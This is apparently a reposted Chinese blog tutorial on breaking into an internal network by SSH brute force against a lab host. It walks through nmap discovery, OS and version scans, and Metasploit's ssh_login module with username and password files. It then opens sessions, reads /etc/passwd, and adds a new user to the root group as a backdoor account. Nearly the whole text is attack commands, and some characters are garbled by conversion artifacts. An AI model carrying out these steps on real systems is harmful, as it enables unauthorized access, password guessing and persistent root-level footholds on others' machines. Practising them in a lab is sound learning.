内网渗透ssh爆破
掃描局域網(wǎng)存活主機(jī)
注意:以下使用的ip地址為我部署的環(huán)境網(wǎng)段,如果你在看本文,請靈活的進(jìn)行學(xué)習(xí)以及使用。目標(biāo)主機(jī)=靶機(jī)
nmap -sP 192.168.1.0/24掃描靶機(jī)的操作系統(tǒng)以及版本號
nmap -O 192.168.1.111掃描靶機(jī)的應(yīng)用程序以及應(yīng)用程序的版本號
nmap -sV 192.168.1.111利用msf ssh_login模塊暴力破解靶機(jī)ssh密碼
先打開MSF 進(jìn)入ssh_login模塊 show options查看提示
使用ssh_login模塊
use auxiliary/scanner/ssh/ssh_login設(shè)定靶機(jī)IP
set RHOSTS 192.168.1.111設(shè)置賬號文件/設(shè)置賬號
你可以設(shè)置賬號,但是只嘗試這一個(gè),建議你使用賬號文件
#設(shè)置賬號 set USERNAME root #設(shè)置賬號文件 set USER_FILE 密碼文件設(shè)置密碼文件/設(shè)置密碼
你可以設(shè)置密碼,但是只嘗試這一個(gè),建議你使用密碼文件
#設(shè)置密碼 set PASSWORD 123456 #設(shè)置密碼文件 set PASS_FILE 密碼文件運(yùn)行
你既可以使用run也可以使用exploit
會(huì)話
查詢會(huì)話方面的信息
sessions -i打開會(huì)話
#打開id為1的會(huì)話 輸入ifconfig查詢ip 成功 sessions -i 1查看密碼文件
cat /etc/passwd添加用戶設(shè)置密碼并添加到root組
useradd admin123 passwd admin123 usermod -g root admin123
作者:逍遙呀
鏈接:https://www.jianshu.com/p/c9598aa2f00e
來源:簡書
簡書著作權(quán)歸作者所有,任何形式的轉(zhuǎn)載都請聯(lián)系作者獲得授權(quán)并注明出處。
總結(jié)
- 上一篇: crackme之019
- 下一篇: 文件上传检测的基本思路